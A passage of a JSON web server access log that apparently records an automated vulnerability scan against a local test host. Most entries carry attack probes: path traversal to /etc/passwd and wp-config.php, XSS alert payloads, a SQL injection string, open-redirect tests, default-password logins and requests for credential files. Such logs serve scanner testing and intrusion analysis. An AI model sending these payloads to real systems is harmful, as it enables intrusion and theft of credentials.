HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJ7e3VzZXJuYW1lfX0ifX0=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /virtualems/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gallery/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/123contactform-for-wordpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dev/tests/functional/credentials.xml.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /VirtualEms/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dev/tests/functional/etc/config.xml.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\x22onmouseover=alert(document.domain)/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"Username=user&Password=MDRmODk5NmRhNzYzYjdhOTY5YjEwMjhlZTMwMDc1NjllYWYzYTYzNTQ4NmRkYWIyMTFkNTEyYzg1YjlkZjhmYg%3D%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsp/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /perl-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/..;/css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /synnefoclient/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //https:example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.dbeaver/credentials-config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //http://127.0.0.1example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php?action=register HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"httpd;General;lang=en&login_id=root&login_pw=sweap12~","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main.ehp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mod/lti/auth.php?redirect_uri=javascript:alert('29K6Bff73NO1nQEF0rJYOLGNdnL') HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/welcome HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autoconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B5example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"------WebKitFormBoundaryreButJNjkCniQExX\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2229K6BdWfQX4ExIaQu7iiMJwgMPV.jar\x22\x0D\x0AContent-Type: 